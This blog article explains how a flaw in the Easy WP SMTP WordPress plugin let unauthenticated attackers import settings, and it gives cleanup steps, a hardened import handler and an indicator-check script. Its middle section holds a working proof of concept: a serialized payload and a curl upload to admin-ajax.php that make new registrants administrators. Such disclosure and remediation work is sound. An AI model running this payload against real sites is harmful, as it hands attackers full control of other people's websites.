wordpress hacker
by Atman Rathod
How to Remove WordPress Redirects by Hackers: A Look at the Easy WP SMTP Plugin Vulnerability
Finding your website redirecting visitors to a spam site is upsetting, and even more so if you had taken every preventive measure for your WordPress website. In this digital world, 30,000 websites are hacked daily, and today might be your day. It is therefore essential to have a plan ready for the day of the attack.
To start with, you need to identify how the attacker was able to insert malicious code that redirects the website to a phishing or malware site and captures its traffic. Recently, when we faced the same issue, we found that the hacker got access through the WP SMTP plugin.
The well-known Easy WP SMTP plugin, which has 300k monthly active installations, is affected by a zero-day vulnerability that lets an unauthenticated user access and modify WordPress settings.
“Almost 30% of online websites are developed in WordPress, making it the best content management system. However, if we look at the popularity shadow then it becomes the first choice for hackers.”
The Easy WP SMTP plugin has drawn attention because of the zero-day (0-day) vulnerability unveiled recently. Because the plugin is installed so widely, attacks against it have an especially high success rate. Before getting to the solution, let’s look at this plugin in detail.
Easy WP SMTP Plugin Zero-Day Vulnerability
Easy WP SMTP exists to make sending email from your WordPress website easy. It does this by sending mail through SMTP instead of the native wp_mail() function, and it has been successful at that.
Like other WordPress plugins, Easy WP SMTP has an administration page where you specify the data required for the SMTP configuration. Along with this, there is a function to import and export settings, and that is where the attacker can easily get in.
Beyond this, there are several more attack vectors that lead the attacker to administrator level or to a leak of sensitive data such as the SMTP credentials.
Consider the following code:
```php
add_action( 'admin_init', array( $this, 'admin_init' ) );

......

// Note: nothing in this function checks the caller's capability or a nonce.
function admin_init() {
    if ( defined( 'DOING_AJAX' ) && DOING_AJAX ) {
        add_action( 'wp_ajax_swpsmtp_clear_log', array( $this, 'clear_log' ) );
        add_action( 'wp_ajax_swpsmtp_self_destruct', array( $this, 'self_destruct_handler' ) );
    }

    //view log file
    if ( isset( $_GET[ 'swpsmtp_action' ] ) ) {
        if ( $_GET[ 'swpsmtp_action' ] === 'view_log' ) {
            $log_file_name = $this->opts[ 'smtp_settings' ][ 'log_file_name' ];
            if ( ! file_exists( plugin_dir_path( __FILE__ ) . $log_file_name ) ) {
                if ( $this->log( "Easy WP SMTP debug log file\r\n\r\n" ) === false ) {
                    wp_die( 'Can\'t write to log file. Check if plugin directory (' . plugin_dir_path( __FILE__ ) . ') is writeable.' );
                };
            }
            $logfile = fopen( plugin_dir_path( __FILE__ ) . $log_file_name, 'rb' );
            if ( ! $logfile ) {
                wp_die( 'Can\'t open log file.' );
            }
            header( 'Content-Type: text/plain' );
            fpassthru( $logfile );
            die;
        }
    }

    //check if this is export settings request
    $is_export_settings = filter_input( INPUT_POST, 'swpsmtp_export_settings', FILTER_SANITIZE_NUMBER_INT );
    if ( $is_export_settings ) {
        $data = array();
        $opts = get_option( 'swpsmtp_options', array() );
        $data[ 'swpsmtp_options' ] = $opts;
        $swpsmtp_pass_encrypted = get_option( 'swpsmtp_pass_encrypted', false );
        $data[ 'swpsmtp_pass_encrypted' ] = $swpsmtp_pass_encrypted;
        if ( $swpsmtp_pass_encrypted ) {
            $swpsmtp_enc_key = get_option( 'swpsmtp_enc_key', false );
            $data[ 'swpsmtp_enc_key' ] = $swpsmtp_enc_key;
        }
        $smtp_test_mail = get_option( 'smtp_test_mail', array() );
        $data[ 'smtp_test_mail' ] = $smtp_test_mail;
        $out = array();
        $out[ 'data' ] = serialize( $data );
        $out[ 'ver' ] = 1;
        $out[ 'checksum' ] = md5( $out[ 'data' ] );

        $filename = 'easy_wp_smtp_settings.txt';
        header( 'Content-Disposition: attachment; filename="' . $filename . '"' );
        header( 'Content-Type: text/plain' );
        echo serialize( $out );
        exit;
    }

    // import settings request: the uploaded file is unserialized and every key is written as an option
    $is_import_settings = filter_input( INPUT_POST, 'swpsmtp_import_settings', FILTER_SANITIZE_NUMBER_INT );
    if ( $is_import_settings ) {
        $err_msg = __( 'Error occurred during settings import', 'easy-wp-smtp' );
        if ( empty( $_FILES[ 'swpsmtp_import_settings_file' ] ) ) {
            echo $err_msg;
            wp_die();
        }
        $in_raw = file_get_contents( $_FILES[ 'swpsmtp_import_settings_file' ][ 'tmp_name' ] );
        try {
            $in = unserialize( $in_raw );
            if ( empty( $in[ 'data' ] ) ) {
                echo $err_msg;
                wp_die();
            }
            if ( empty( $in[ 'checksum' ] ) ) {
                echo $err_msg;
                wp_die();
            }
            if ( md5( $in[ 'data' ] ) !== $in[ 'checksum' ] ) {
                echo $err_msg;
                wp_die();
            }
            $data = unserialize( $in[ 'data' ] );
            foreach ( $data as $key => $value ) {
                update_option( $key, $value );
            }
            set_transient( 'easy_wp_smtp_settings_import_success', true, 60 * 60 );
            $url = admin_url() . 'options-general.php?page=swpsmtp_settings';
            wp_safe_redirect( $url );
            exit;
        } catch ( Exception $ex ) {
            echo $err_msg;
            wp_die();
        }
    }
}
```
When a user enters the admin area, the function admin_init() in the script easy-wp-smtp.php is called via the admin_init hook. This one function handles every administrative action of the plugin, from viewing or clearing the log to importing or exporting the plugin configuration stored in the WordPress database.
The function never checks the caller’s capability, so any logged-in user can trigger it. Worse, it can also be reached by unauthenticated users: Easy WP SMTP registers AJAX handlers, and the admin_init hook also fires on admin-ajax.php, as described in the WordPress API docs.
So an unauthenticated user can simply send an AJAX request, for example action=swpsmtp_clear_log, to reach the function above and have its code run.
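The fix the plugin needed is a capability check, a nonce check, and a refusal to write arbitrary options. The handler below is an added example written for this article, not the plugin’s own code; it assumes the settings page emits a nonce named swpsmtp_import_settings (a hypothetical name) and uses only real WordPress and PHP functions.

```php
<?php
// Added example (not the plugin's code): a hardened replacement for the import branch.
// Assumes the settings form calls wp_nonce_field( 'swpsmtp_import_settings' ) (hypothetical nonce name).

function swpsmtp_safe_import_settings() {
    // Only handle real admin-page requests; admin_init also fires on admin-ajax.php.
    if ( ! is_admin() || wp_doing_ajax() ) {
        return;
    }
    if ( ! filter_input( INPUT_POST, 'swpsmtp_import_settings', FILTER_SANITIZE_NUMBER_INT ) ) {
        return;
    }
    // 1. Capability check: the vulnerable handler had none.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( esc_html__( 'You are not allowed to import settings.', 'easy-wp-smtp' ), '', array( 'response' => 403 ) );
    }
    // 2. CSRF check: dies if the _wpnonce field is missing or invalid.
    check_admin_referer( 'swpsmtp_import_settings' );

    $err_msg = esc_html__( 'Error occurred during settings import', 'easy-wp-smtp' );
    $tmp     = isset( $_FILES['swpsmtp_import_settings_file']['tmp_name'] ) ? $_FILES['swpsmtp_import_settings_file']['tmp_name'] : '';
    if ( $tmp === '' || ! is_uploaded_file( $tmp ) ) {
        wp_die( $err_msg );
    }
    $in_raw = file_get_contents( $tmp );

    // 3. Never instantiate objects from untrusted data (PHP object injection).
    //    The md5 checksum only detects corruption; anyone can compute it, so it is not a trust boundary.
    $in = unserialize( $in_raw, array( 'allowed_classes' => false ) );
    if ( ! is_array( $in ) || empty( $in['data'] ) || empty( $in['checksum'] )
        || ! hash_equals( md5( $in['data'] ), (string) $in['checksum'] ) ) {
        wp_die( $err_msg );
    }
    $data = unserialize( $in['data'], array( 'allowed_classes' => false ) );
    if ( ! is_array( $data ) ) {
        wp_die( $err_msg );
    }

    // 4. Only the plugin's own options may be written; users_can_register and default_role are refused.
    $allowed = array( 'swpsmtp_options', 'swpsmtp_pass_encrypted', 'swpsmtp_enc_key', 'smtp_test_mail' );
    foreach ( $data as $key => $value ) {
        if ( in_array( $key, $allowed, true ) ) {
            update_option( $key, $value );
        }
    }
    set_transient( 'easy_wp_smtp_settings_import_success', true, HOUR_IN_SECONDS );
    wp_safe_redirect( admin_url( 'options-general.php?page=swpsmtp_settings' ) );
    exit;
}
add_action( 'admin_init', 'swpsmtp_safe_import_settings' );
```

With this in place the proof-of-concept request below fails at the AJAX check, the capability check and the nonce check, and even a legitimate import cannot change the registration defaults.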
Therefore, to safeguard your website, we recommend that you always update the Easy WP SMTP plugin to the latest version available.
Note the Proof of Concept
The following two-step proof of concept allows you to create a user ID with admin access, from which you can make the changes needed to remove the malware code. In short, it gives complete control over the website.
It uses swpsmtp_import_settings to upload a file containing a malicious serialized payload. The imported settings enable user registration and set the default role to “administrator” in the database.
1. Create a file named /tmp/upload.txt with this content:

```text
a:2:{s:4:"data";s:81:"a:2:{s:18:"users_can_register";s:1:"1";s:12:"default_role";s:13:"administrator";}";s:8:"checksum";s:32:"3ce5fb6d7b1dbd6252f4b5b3526650c8";}
```
2. Upload the file:

```sh
$ curl https://VICTIM.COM/wp-admin/admin-ajax.php -F 'action=swpsmtp_clear_log' -F 'swpsmtp_import_settings=1' -F 'swpsmtp_import_settings_file=@/tmp/upload.txt'
```
Other details you need to pay attention to:
- Be aware of remote code execution via PHP object injection, since Easy WP SMTP uses unsafe unserialize() calls.
- Watch for unexpected log files, as the attacker can change the log filename.
- By exporting the plugin configuration, which includes the SMTP host, username and password, the attacker can use your mail server to send spam.
Steps to Remove Malware WordPress Redirects
- Change passwords and check registered users
- Find and remove the unwanted plugins and themes from the website
- Check the website completely with appropriate tools
- Find the right WordPress plugin to scan your website files
- Thoroughly check all the impacted files
- Reinstall your WordPress files, plugins, and themes
- Resubmit the website to Google
Other Important Recommendations
If you are using the old version of Easy WP SMTP plugin, check the following things:
- Check the Settings page, from the site URL to the default user role, and ensure nothing has been altered.
- Check for new admin accounts, changed email addresses and the like.
- Change all passwords.
- Change your SMTP password too, as the hackers may now have it.
- Install a web application firewall for better security.
- Don’t install plugins or themes from unknown sources.
- Update all your themes and plugins monthly.
- Make sure your WordPress installation is regularly backed up.
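The checks in the two lists above can be scripted. The following is an added example, not part of the article or the plugin: it runs inside WordPress (for instance with `wp eval-file`, the file name being ours) and reports the traces this particular attack leaves, namely the flipped registration options, altered site URLs, recently created administrators and a tampered log filename. The expected host and the 30-day window are assumptions you should adjust.

```php
<?php
// Added example, not from the article or the plugin. Run from the site root with:
//   wp eval-file swpsmtp-incident-check.php      (our file name)
// Returns the indicators found; an empty list means none of these traces are present.

function swpsmtp_incident_findings( $expected_host, $days_back = 30 ) {
    $findings = array();

    // 1. The PoC payload turns on open registration with "administrator" as the default role.
    if ( (string) get_option( 'users_can_register' ) === '1' ) {
        $findings[] = 'users_can_register is enabled';
    }
    $role = (string) get_option( 'default_role' );
    if ( $role !== 'subscriber' ) {
        $findings[] = "default_role is '{$role}' (expected subscriber)";
    }

    // 2. Redirect malware frequently rewrites the site address options; compare with the host you own.
    foreach ( array( 'siteurl', 'home' ) as $opt ) {
        $host = wp_parse_url( (string) get_option( $opt ), PHP_URL_HOST );
        if ( $host !== $expected_host ) {
            $findings[] = "{$opt} points at '{$host}', not '{$expected_host}'";
        }
    }

    // 3. Administrator accounts registered recently (created through the flipped defaults).
    $since = time() - $days_back * DAY_IN_SECONDS;
    foreach ( get_users( array( 'role' => 'administrator' ) ) as $user ) {
        if ( strtotime( $user->user_registered ) >= $since ) {
            $findings[] = "administrator '{$user->user_login}' ({$user->user_email}) registered {$user->user_registered}";
        }
    }

    // 4. The log filename is attacker-controllable; a path component or a non .txt/.log suffix is suspicious.
    $opts = get_option( 'swpsmtp_options', array() );
    $log  = isset( $opts['smtp_settings']['log_file_name'] ) ? (string) $opts['smtp_settings']['log_file_name'] : '';
    if ( $log !== '' && ( basename( $log ) !== $log || ! preg_match( '/\.(txt|log)$/i', $log ) ) ) {
        $findings[] = "log_file_name is '{$log}'";
    }

    return $findings;
}

$findings = swpsmtp_incident_findings( 'example.com' ); // assumption: replace with your own domain
echo $findings ? implode( "\n", $findings ) . "\n" : "No indicators found\n";
```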
If required, change the web host to one that has better WordPress security.